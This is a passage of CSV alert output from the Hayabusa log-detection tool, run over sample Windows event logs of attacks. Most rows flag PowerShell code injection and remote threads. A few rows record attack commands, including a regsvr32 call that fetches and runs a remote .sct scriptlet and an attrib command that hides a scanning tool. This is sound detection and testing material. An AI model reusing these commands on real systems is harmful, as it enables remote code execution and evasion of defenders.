+09:00,IEWIN7,8,high,Suspicious Remote Thread Created,,rules/sigma/create_remote_thread/sysmon_suspicious_remote_thread.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Defense Evasion/de_unmanagedpowershell_psinject_sysmon_7_8_10.evtx +2019-05-19 02:16:16.989 +09:00,IEWIN7,8,high,Accessing WinAPI in PowerShell. Code Injection.,,rules/sigma/create_remote_thread/sysmon_powershell_code_injection.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Defense Evasion/de_unmanagedpowershell_psinject_sysmon_7_8_10.evtx +2019-05-19 02:16:16.989 +09:00,IEWIN7,8,high,Suspicious Remote Thread Created,,rules/sigma/create_remote_thread/sysmon_suspicious_remote_thread.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Defense Evasion/de_unmanagedpowershell_psinject_sysmon_7_8_10.evtx +2019-05-19 02:16:17.005 +09:00,IEWIN7,8,high,Accessing WinAPI in PowerShell. Code Injection.,,rules/sigma/create_remote_thread/sysmon_powershell_code_injection.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Defense Evasion/de_unmanagedpowershell_psinject_sysmon_7_8_10.evtx +2019-05-19 02:16:17.005 +09:00,IEWIN7,8,high,Suspicious Remote Thread Created,,rules/sigma/create_remote_thread/sysmon_suspicious_remote_thread.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Defense Evasion/de_unmanagedpowershell_psinject_sysmon_7_8_10.evtx +2019-05-19 02:16:17.020 +09:00,IEWIN7,8,high,Accessing WinAPI in PowerShell. Code Injection.,,rules/sigma/create_remote_thread/sysmon_powershell_code_injection.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Defense Evasion/de_unmanagedpowershell_psinject_sysmon_7_8_10.evtx +2019-05-19 02:16:17.020 +09:00,IEWIN7,8,high,Suspicious Remote Thread Created,,rules/sigma/create_remote_thread/sysmon_suspicious_remote_thread.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Defense Evasion/de_unmanagedpowershell_psinject_sysmon_7_8_10.evtx +2019-05-19 02:16:17.036 +09:00,IEWIN7,8,high,Accessing WinAPI in PowerShell. Code Injection.,,rules/sigma/create_remote_thread/sysmon_powershell_code_injection.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Defense Evasion/de_unmanagedpowershell_psinject_sysmon_7_8_10.evtx +2019-05-19 02:16:17.036 +09:00,IEWIN7,8,high,Suspicious Remote Thread Created,,rules/sigma/create_remote_thread/sysmon_suspicious_remote_thread.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Defense Evasion/de_unmanagedpowershell_psinject_sysmon_7_8_10.evtx +2019-05-19 02:16:17.051 +09:00,IEWIN7,8,high,Accessing WinAPI in PowerShell. Code Injection.,,rules/sigma/create_remote_thread/sysmon_powershell_code_injection.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Defense Evasion/de_unmanagedpowershell_psinject_sysmon_7_8_10.evtx +2019-05-19 02:16:17.051 +09:00,IEWIN7,8,high,Suspicious Remote Thread Created,,rules/sigma/create_remote_thread/sysmon_suspicious_remote_thread.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Defense Evasion/de_unmanagedpowershell_psinject_sysmon_7_8_10.evtx +2019-05-19 02:16:17.083 +09:00,IEWIN7,8,high,Accessing WinAPI in PowerShell. Code Injection.,,rules/sigma/create_remote_thread/sysmon_powershell_code_injection.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Defense Evasion/de_unmanagedpowershell_psinject_sysmon_7_8_10.evtx +2019-05-19 02:16:17.083 +09:00,IEWIN7,8,high,Suspicious Remote Thread Created,,rules/sigma/create_remote_thread/sysmon_suspicious_remote_thread.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Defense Evasion/de_unmanagedpowershell_psinject_sysmon_7_8_10.evtx +2019-05-19 02:16:17.098 +09:00,IEWIN7,8,high,Accessing WinAPI in PowerShell. Code Injection.,,rules/sigma/create_remote_thread/sysmon_powershell_code_injection.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Defense Evasion/de_unmanagedpowershell_psinject_sysmon_7_8_10.evtx +2019-05-19 02:16:17.098 +09:00,IEWIN7,8,high,Suspicious Remote Thread Created,,rules/sigma/create_remote_thread/sysmon_suspicious_remote_thread.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Defense Evasion/de_unmanagedpowershell_psinject_sysmon_7_8_10.evtx +2019-05-19 02:16:17.114 +09:00,IEWIN7,8,high,Accessing WinAPI in PowerShell. Code Injection.,,rules/sigma/create_remote_thread/sysmon_powershell_code_injection.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Defense Evasion/de_unmanagedpowershell_psinject_sysmon_7_8_10.evtx +2019-05-19 02:16:17.114 +09:00,IEWIN7,8,high,Suspicious Remote Thread Created,,rules/sigma/create_remote_thread/sysmon_suspicious_remote_thread.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Defense Evasion/de_unmanagedpowershell_psinject_sysmon_7_8_10.evtx +2019-05-19 02:16:17.130 +09:00,IEWIN7,8,high,Accessing WinAPI in PowerShell. Code Injection.,,rules/sigma/create_remote_thread/sysmon_powershell_code_injection.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Defense Evasion/de_unmanagedpowershell_psinject_sysmon_7_8_10.evtx +2019-05-19 02:16:17.130 +09:00,IEWIN7,8,high,Suspicious Remote Thread Created,,rules/sigma/create_remote_thread/sysmon_suspicious_remote_thread.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Defense Evasion/de_unmanagedpowershell_psinject_sysmon_7_8_10.evtx +2019-05-19 02:16:17.145 +09:00,IEWIN7,8,high,Accessing WinAPI in PowerShell. Code Injection.,,rules/sigma/create_remote_thread/sysmon_powershell_code_injection.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Defense Evasion/de_unmanagedpowershell_psinject_sysmon_7_8_10.evtx +2019-05-19 02:16:17.145 +09:00,IEWIN7,8,high,Suspicious Remote Thread Created,,rules/sigma/create_remote_thread/sysmon_suspicious_remote_thread.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Defense Evasion/de_unmanagedpowershell_psinject_sysmon_7_8_10.evtx +2019-05-19 02:16:17.161 +09:00,IEWIN7,8,high,Accessing WinAPI in PowerShell. Code Injection.,,rules/sigma/create_remote_thread/sysmon_powershell_code_injection.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Defense Evasion/de_unmanagedpowershell_psinject_sysmon_7_8_10.evtx +2019-05-19 02:16:17.161 +09:00,IEWIN7,8,high,Suspicious Remote Thread Created,,rules/sigma/create_remote_thread/sysmon_suspicious_remote_thread.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Defense Evasion/de_unmanagedpowershell_psinject_sysmon_7_8_10.evtx +2019-05-19 02:16:17.176 +09:00,IEWIN7,8,high,Accessing WinAPI in PowerShell. Code Injection.,,rules/sigma/create_remote_thread/sysmon_powershell_code_injection.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Defense Evasion/de_unmanagedpowershell_psinject_sysmon_7_8_10.evtx +2019-05-19 02:16:17.176 +09:00,IEWIN7,8,high,Suspicious Remote Thread Created,,rules/sigma/create_remote_thread/sysmon_suspicious_remote_thread.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Defense Evasion/de_unmanagedpowershell_psinject_sysmon_7_8_10.evtx +2019-05-19 02:16:17.192 +09:00,IEWIN7,8,high,Accessing WinAPI in PowerShell. Code Injection.,,rules/sigma/create_remote_thread/sysmon_powershell_code_injection.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Defense Evasion/de_unmanagedpowershell_psinject_sysmon_7_8_10.evtx +2019-05-19 02:16:17.192 +09:00,IEWIN7,8,high,Suspicious Remote Thread Created,,rules/sigma/create_remote_thread/sysmon_suspicious_remote_thread.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Defense Evasion/de_unmanagedpowershell_psinject_sysmon_7_8_10.evtx +2019-05-19 02:16:17.208 +09:00,IEWIN7,8,high,Accessing WinAPI in PowerShell. Code Injection.,,rules/sigma/create_remote_thread/sysmon_powershell_code_injection.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Defense Evasion/de_unmanagedpowershell_psinject_sysmon_7_8_10.evtx +2019-05-19 02:16:17.208 +09:00,IEWIN7,8,high,Suspicious Remote Thread Created,,rules/sigma/create_remote_thread/sysmon_suspicious_remote_thread.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Defense Evasion/de_unmanagedpowershell_psinject_sysmon_7_8_10.evtx +2019-05-19 02:16:17.223 +09:00,IEWIN7,8,high,Accessing WinAPI in PowerShell. Code Injection.,,rules/sigma/create_remote_thread/sysmon_powershell_code_injection.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Defense Evasion/de_unmanagedpowershell_psinject_sysmon_7_8_10.evtx +2019-05-19 02:16:17.223 +09:00,IEWIN7,8,high,Suspicious Remote Thread Created,,rules/sigma/create_remote_thread/sysmon_suspicious_remote_thread.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Defense Evasion/de_unmanagedpowershell_psinject_sysmon_7_8_10.evtx +2019-05-19 02:16:17.239 +09:00,IEWIN7,8,high,Accessing WinAPI in PowerShell. Code Injection.,,rules/sigma/create_remote_thread/sysmon_powershell_code_injection.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Defense Evasion/de_unmanagedpowershell_psinject_sysmon_7_8_10.evtx +2019-05-19 02:16:17.239 +09:00,IEWIN7,8,high,Suspicious Remote Thread Created,,rules/sigma/create_remote_thread/sysmon_suspicious_remote_thread.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Defense Evasion/de_unmanagedpowershell_psinject_sysmon_7_8_10.evtx +2019-05-19 02:16:17.270 +09:00,IEWIN7,8,high,Accessing WinAPI in PowerShell. Code Injection.,,rules/sigma/create_remote_thread/sysmon_powershell_code_injection.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Defense Evasion/de_unmanagedpowershell_psinject_sysmon_7_8_10.evtx +2019-05-19 02:16:17.270 +09:00,IEWIN7,8,high,Suspicious Remote Thread Created,,rules/sigma/create_remote_thread/sysmon_suspicious_remote_thread.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Defense Evasion/de_unmanagedpowershell_psinject_sysmon_7_8_10.evtx +2019-05-19 02:16:17.286 +09:00,IEWIN7,8,high,Accessing WinAPI in PowerShell. Code Injection.,,rules/sigma/create_remote_thread/sysmon_powershell_code_injection.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Defense Evasion/de_unmanagedpowershell_psinject_sysmon_7_8_10.evtx +2019-05-19 02:16:17.286 +09:00,IEWIN7,8,high,Suspicious Remote Thread Created,,rules/sigma/create_remote_thread/sysmon_suspicious_remote_thread.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Defense Evasion/de_unmanagedpowershell_psinject_sysmon_7_8_10.evtx +2019-05-19 02:16:17.301 +09:00,IEWIN7,8,high,Accessing WinAPI in PowerShell. Code Injection.,,rules/sigma/create_remote_thread/sysmon_powershell_code_injection.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Defense Evasion/de_unmanagedpowershell_psinject_sysmon_7_8_10.evtx +2019-05-19 02:16:17.301 +09:00,IEWIN7,8,high,Suspicious Remote Thread Created,,rules/sigma/create_remote_thread/sysmon_suspicious_remote_thread.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Defense Evasion/de_unmanagedpowershell_psinject_sysmon_7_8_10.evtx +2019-05-19 02:16:17.317 +09:00,IEWIN7,8,high,Accessing WinAPI in PowerShell. Code Injection.,,rules/sigma/create_remote_thread/sysmon_powershell_code_injection.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Defense Evasion/de_unmanagedpowershell_psinject_sysmon_7_8_10.evtx +2019-05-19 02:16:17.317 +09:00,IEWIN7,8,high,Suspicious Remote Thread Created,,rules/sigma/create_remote_thread/sysmon_suspicious_remote_thread.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Defense Evasion/de_unmanagedpowershell_psinject_sysmon_7_8_10.evtx +2019-05-19 02:16:17.348 +09:00,IEWIN7,8,high,Accessing WinAPI in PowerShell. Code Injection.,,rules/sigma/create_remote_thread/sysmon_powershell_code_injection.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Defense Evasion/de_unmanagedpowershell_psinject_sysmon_7_8_10.evtx +2019-05-19 02:16:17.348 +09:00,IEWIN7,8,high,Suspicious Remote Thread Created,,rules/sigma/create_remote_thread/sysmon_suspicious_remote_thread.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Defense Evasion/de_unmanagedpowershell_psinject_sysmon_7_8_10.evtx +2019-05-19 02:16:17.364 +09:00,IEWIN7,8,high,Accessing WinAPI in PowerShell. Code Injection.,,rules/sigma/create_remote_thread/sysmon_powershell_code_injection.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Defense Evasion/de_unmanagedpowershell_psinject_sysmon_7_8_10.evtx +2019-05-19 02:16:17.364 +09:00,IEWIN7,8,high,Suspicious Remote Thread Created,,rules/sigma/create_remote_thread/sysmon_suspicious_remote_thread.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Defense Evasion/de_unmanagedpowershell_psinject_sysmon_7_8_10.evtx +2019-05-19 02:16:17.380 +09:00,IEWIN7,8,high,Accessing WinAPI in PowerShell. Code Injection.,,rules/sigma/create_remote_thread/sysmon_powershell_code_injection.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Defense Evasion/de_unmanagedpowershell_psinject_sysmon_7_8_10.evtx +2019-05-19 02:16:17.380 +09:00,IEWIN7,8,high,Suspicious Remote Thread Created,,rules/sigma/create_remote_thread/sysmon_suspicious_remote_thread.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Defense Evasion/de_unmanagedpowershell_psinject_sysmon_7_8_10.evtx +2019-05-19 02:16:17.395 +09:00,IEWIN7,8,high,Accessing WinAPI in PowerShell. Code Injection.,,rules/sigma/create_remote_thread/sysmon_powershell_code_injection.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Defense Evasion/de_unmanagedpowershell_psinject_sysmon_7_8_10.evtx +2019-05-19 02:16:17.395 +09:00,IEWIN7,8,high,Suspicious Remote Thread Created,,rules/sigma/create_remote_thread/sysmon_suspicious_remote_thread.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Defense Evasion/de_unmanagedpowershell_psinject_sysmon_7_8_10.evtx +2019-05-19 02:16:17.426 +09:00,IEWIN7,8,high,Accessing WinAPI in PowerShell. Code Injection.,,rules/sigma/create_remote_thread/sysmon_powershell_code_injection.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Defense Evasion/de_unmanagedpowershell_psinject_sysmon_7_8_10.evtx +2019-05-19 02:16:17.426 +09:00,IEWIN7,8,high,Suspicious Remote Thread Created,,rules/sigma/create_remote_thread/sysmon_suspicious_remote_thread.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Defense Evasion/de_unmanagedpowershell_psinject_sysmon_7_8_10.evtx +2019-05-19 02:16:17.442 +09:00,IEWIN7,8,high,Accessing WinAPI in PowerShell. Code Injection.,,rules/sigma/create_remote_thread/sysmon_powershell_code_injection.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Defense Evasion/de_unmanagedpowershell_psinject_sysmon_7_8_10.evtx +2019-05-19 02:16:17.442 +09:00,IEWIN7,8,high,Suspicious Remote Thread Created,,rules/sigma/create_remote_thread/sysmon_suspicious_remote_thread.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Defense Evasion/de_unmanagedpowershell_psinject_sysmon_7_8_10.evtx +2019-05-19 02:16:17.489 +09:00,IEWIN7,8,high,Accessing WinAPI in PowerShell. Code Injection.,,rules/sigma/create_remote_thread/sysmon_powershell_code_injection.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Defense Evasion/de_unmanagedpowershell_psinject_sysmon_7_8_10.evtx +2019-05-19 02:16:17.489 +09:00,IEWIN7,8,high,Suspicious Remote Thread Created,,rules/sigma/create_remote_thread/sysmon_suspicious_remote_thread.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Defense Evasion/de_unmanagedpowershell_psinject_sysmon_7_8_10.evtx +2019-05-19 02:16:17.505 +09:00,IEWIN7,8,high,Accessing WinAPI in PowerShell. Code Injection.,,rules/sigma/create_remote_thread/sysmon_powershell_code_injection.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Defense Evasion/de_unmanagedpowershell_psinject_sysmon_7_8_10.evtx +2019-05-19 02:16:17.505 +09:00,IEWIN7,8,high,Suspicious Remote Thread Created,,rules/sigma/create_remote_thread/sysmon_suspicious_remote_thread.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Defense Evasion/de_unmanagedpowershell_psinject_sysmon_7_8_10.evtx +2019-05-19 02:16:17.520 +09:00,IEWIN7,8,high,Accessing WinAPI in PowerShell. Code Injection.,,rules/sigma/create_remote_thread/sysmon_powershell_code_injection.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Defense Evasion/de_unmanagedpowershell_psinject_sysmon_7_8_10.evtx +2019-05-19 02:16:17.520 +09:00,IEWIN7,8,high,Suspicious Remote Thread Created,,rules/sigma/create_remote_thread/sysmon_suspicious_remote_thread.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Defense Evasion/de_unmanagedpowershell_psinject_sysmon_7_8_10.evtx +2019-05-19 02:16:17.536 +09:00,IEWIN7,8,high,Accessing WinAPI in PowerShell. Code Injection.,,rules/sigma/create_remote_thread/sysmon_powershell_code_injection.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Defense Evasion/de_unmanagedpowershell_psinject_sysmon_7_8_10.evtx +2019-05-19 02:16:17.536 +09:00,IEWIN7,8,high,Suspicious Remote Thread Created,,rules/sigma/create_remote_thread/sysmon_suspicious_remote_thread.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Defense Evasion/de_unmanagedpowershell_psinject_sysmon_7_8_10.evtx +2019-05-19 02:16:17.551 +09:00,IEWIN7,8,high,Accessing WinAPI in PowerShell. Code Injection.,,rules/sigma/create_remote_thread/sysmon_powershell_code_injection.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Defense Evasion/de_unmanagedpowershell_psinject_sysmon_7_8_10.evtx +2019-05-19 02:16:17.551 +09:00,IEWIN7,8,high,Suspicious Remote Thread Created,,rules/sigma/create_remote_thread/sysmon_suspicious_remote_thread.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Defense Evasion/de_unmanagedpowershell_psinject_sysmon_7_8_10.evtx +2019-05-19 02:16:17.567 +09:00,IEWIN7,8,high,Accessing WinAPI in PowerShell. Code Injection.,,rules/sigma/create_remote_thread/sysmon_powershell_code_injection.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Defense Evasion/de_unmanagedpowershell_psinject_sysmon_7_8_10.evtx +2019-05-19 02:16:17.567 +09:00,IEWIN7,8,high,Accessing WinAPI in PowerShell. Code Injection.,,rules/sigma/create_remote_thread/sysmon_powershell_code_injection.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Defense Evasion/de_unmanagedpowershell_psinject_sysmon_7_8_10.evtx +2019-05-19 02:16:17.567 +09:00,IEWIN7,8,high,Suspicious Remote Thread Created,,rules/sigma/create_remote_thread/sysmon_suspicious_remote_thread.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Defense Evasion/de_unmanagedpowershell_psinject_sysmon_7_8_10.evtx +2019-05-19 02:16:17.567 +09:00,IEWIN7,8,high,Suspicious Remote Thread Created,,rules/sigma/create_remote_thread/sysmon_suspicious_remote_thread.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Defense Evasion/de_unmanagedpowershell_psinject_sysmon_7_8_10.evtx +2019-05-19 02:16:17.583 +09:00,IEWIN7,8,high,Accessing WinAPI in PowerShell. Code Injection.,,rules/sigma/create_remote_thread/sysmon_powershell_code_injection.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Defense Evasion/de_unmanagedpowershell_psinject_sysmon_7_8_10.evtx +2019-05-19 02:16:17.583 +09:00,IEWIN7,8,high,Suspicious Remote Thread Created,,rules/sigma/create_remote_thread/sysmon_suspicious_remote_thread.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Defense Evasion/de_unmanagedpowershell_psinject_sysmon_7_8_10.evtx +2019-05-19 02:16:17.598 +09:00,IEWIN7,8,high,Accessing WinAPI in PowerShell. Code Injection.,,rules/sigma/create_remote_thread/sysmon_powershell_code_injection.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Defense Evasion/de_unmanagedpowershell_psinject_sysmon_7_8_10.evtx +2019-05-19 02:16:17.598 +09:00,IEWIN7,8,high,Suspicious Remote Thread Created,,rules/sigma/create_remote_thread/sysmon_suspicious_remote_thread.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Defense Evasion/de_unmanagedpowershell_psinject_sysmon_7_8_10.evtx +2019-05-19 02:16:17.614 +09:00,IEWIN7,8,high,Accessing WinAPI in PowerShell. Code Injection.,,rules/sigma/create_remote_thread/sysmon_powershell_code_injection.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Defense Evasion/de_unmanagedpowershell_psinject_sysmon_7_8_10.evtx +2019-05-19 02:16:17.614 +09:00,IEWIN7,8,high,Suspicious Remote Thread Created,,rules/sigma/create_remote_thread/sysmon_suspicious_remote_thread.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Defense Evasion/de_unmanagedpowershell_psinject_sysmon_7_8_10.evtx +2019-05-19 02:16:17.661 +09:00,IEWIN7,8,high,Accessing WinAPI in PowerShell. Code Injection.,,rules/sigma/create_remote_thread/sysmon_powershell_code_injection.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Defense Evasion/de_unmanagedpowershell_psinject_sysmon_7_8_10.evtx +2019-05-19 02:16:17.661 +09:00,IEWIN7,8,high,Suspicious Remote Thread Created,,rules/sigma/create_remote_thread/sysmon_suspicious_remote_thread.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Defense Evasion/de_unmanagedpowershell_psinject_sysmon_7_8_10.evtx +2019-05-19 02:16:17.708 +09:00,IEWIN7,8,high,Accessing WinAPI in PowerShell. Code Injection.,,rules/sigma/create_remote_thread/sysmon_powershell_code_injection.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Defense Evasion/de_unmanagedpowershell_psinject_sysmon_7_8_10.evtx +2019-05-19 02:16:17.708 +09:00,IEWIN7,8,high,Suspicious Remote Thread Created,,rules/sigma/create_remote_thread/sysmon_suspicious_remote_thread.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Defense Evasion/de_unmanagedpowershell_psinject_sysmon_7_8_10.evtx +2019-05-19 02:16:17.786 +09:00,IEWIN7,8,high,Accessing WinAPI in PowerShell. Code Injection.,,rules/sigma/create_remote_thread/sysmon_powershell_code_injection.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Defense Evasion/de_unmanagedpowershell_psinject_sysmon_7_8_10.evtx +2019-05-19 02:16:17.786 +09:00,IEWIN7,8,high,Suspicious Remote Thread Created,,rules/sigma/create_remote_thread/sysmon_suspicious_remote_thread.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Defense Evasion/de_unmanagedpowershell_psinject_sysmon_7_8_10.evtx +2019-05-19 02:16:18.833 +09:00,IEWIN7,7,high,In-memory PowerShell,,rules/sigma/image_load/sysmon_in_memory_powershell.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Defense Evasion/de_unmanagedpowershell_psinject_sysmon_7_8_10.evtx +2019-05-19 02:50:36.858 +09:00,IEWIN7,1,high,Process Creation Sysmon Rule Alert,"Rule: Execution - jscript9 engine invoked via clsid : Command: winpm.exe //e:{16d51579-a30b-4c8b-a276-0ff4dc41e755} winpm_update.js : Path: C:\ProgramData\winpm.exe : User: IEWIN7\IEUser : Parent Command: ""C:\Windows\system32\cmd.exe"" ",rules/hayabusa/sysmon/alerts/1_ProcessCreationSysmonAlert.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Execution/exec_sysmon_1_7_jscript9_defense_evasion.evtx +2019-05-19 02:51:14.254 +09:00,IEWIN7,1,informational,Process Creation,Command: /u /s /i:https://raw.githubusercontent.com/3gstudent/SCTPersistence/master/calc.sct scrobj.dll : Path: C:\Windows\System32\regsvr32.exe : User: IEWIN7\IEUser : Parent Command: C:\Windows\system32\svchost.exe -k netsvcs,rules/hayabusa/sysmon/events/1_ProcessCreation.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Execution/exec_sysmon_1_7_jscript9_defense_evasion.evtx +2019-05-19 02:51:14.254 +09:00,IEWIN7,1,high,Regsvr32 Flags Anomaly,,rules/sigma/process_creation/win_susp_regsvr32_flags_anomaly.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Execution/exec_sysmon_1_7_jscript9_defense_evasion.evtx +2019-05-19 02:51:14.254 +09:00,IEWIN7,1,high,Regsvr32 Anomaly,,rules/sigma/process_creation/win_susp_regsvr32_anomalies.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Execution/exec_sysmon_1_7_jscript9_defense_evasion.evtx +2019-05-20 02:32:00.482 +09:00,DC1.insecurebank.local,1,high,Process Creation Sysmon Rule Alert,"Rule: technique_id=T1158,technique_name=Hidden Files and DirectoriesHidden Files and Directories : Command: attrib +h nbtscan.exe : Path: C:\Windows\System32\attrib.exe : User: insecurebank\Administrator : Parent Command: ""C:\Windows\system32\cmd.exe"" ",rules/hayabusa/sysmon/alerts/1_ProcessCreationSysmonAlert.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Defense Evasion/de_hiding_files_via_attrib_cmdlet.evtx +2019-05-20 02:32:00.482 +09:00,DC1.insecurebank.local,1,low,Hiding Files with Attrib.exe,,rules/sigma/process_creation/win_attrib_hiding_files.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Defense Evasion/de_hiding_files_via_attrib_cmdlet.evtx +2019-05-21 09:35:07.308 +09:00,IEWIN7,1,informational,Process Creation,"Command: ""C:\Users\IEUser\Downloads\com-hijack.exe"" : Path: C:\Users\IEUser\Downloads\com-hijack.exe : User: IEWIN7\IEUser : Parent Command: C:\Windows\Explorer.EXE",rules/hayabusa/sysmon/events/1_ProcessCreation.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Persistence/persist_firefox_comhijack_sysmon_11_13_7_1.evtx +2019-05-21 09:35:07.308 +09:00,IEWIN7,1,medium,Suspicious File Characteristics Due to Missing Fields,,rules/sigma/process_creation/win_susp_file_characteristics.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Persistence/persist_firefox_comhijack_sysmon_11_13_7_1.evtx +2019-05-21 09:35:07.474 +09:00,IEWIN7,1,informational,Process Creation,"Command: C:\Windows\system32\cmd.exe /c test.bat : Path: C:\Windows\System32\cmd.exe : User: IEWIN7\IEUser : Parent Command: ""C:\Users\IEUser\Downloads\com-hijack.exe"" ",rules/hayabusa/sysmon/events/1_ProcessCreation.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Persistence/persist_firefox_comhijack_sysmon_11_13_7_1.evtx +2019-05-21 09:35:07.474 +09:00,IEWIN7,1,informational,Process Creation,"Command: C:\Windows\system32\cmd.exe /c pause : Path: C:\Windows\System32\cmd.exe : User: IEWIN7\IEUser : Parent Command: ""C:\Users\IEUser\Downloads\com-hijack.exe"" ",rules/hayabusa/sysmon/events/1_ProcessCreation.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Persistence/persist_firefox_comhijack_sysmon_11_13_7_1.evtx +2019-05-21 09:35:07.518 +09:00,IEWIN7,1,informational,Process Creation,"Command: ""C:\Program Files\Mozilla Firefox\firefox.exe"" : Path: C:\Program Files\Mozilla Firefox\firefox.exe : User: IEWIN7\IEUser : Parent Command: C:\Windows\system32\cmd.exe /c test.bat",rules/hayabusa/sysmon/events/1_ProcessCreation.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Persistence/persist_firefox_comhijack_sysmon_11_13_7_1.evtx +2019-05-21 09:35:07.870 +09:00,IEWIN7,1,informational,Process Creation,"Command: ""C:\Program Files\Mozilla Firefox\firefox.exe"" -contentproc --channel=""3168.0.153744822\2027949517"" -parentBuildID 20190507012018 -greomni ""C:\Program Files\Mozilla Firefox\omni.ja"" -appomni ""C:\Program Files\Mozilla Firefox\browser\omni.ja"" -appdir ""C:\Program Files\Mozilla Firefox\browser"" - 3168 ""\\.\pipe\gecko-crash-server-pipe.3168"" 956 gpu : Path: C:\Program Files\Mozilla Firefox\firefox.exe : User: IEWIN7\IEUser : Parent Command: ""C:\Program Files\Mozilla 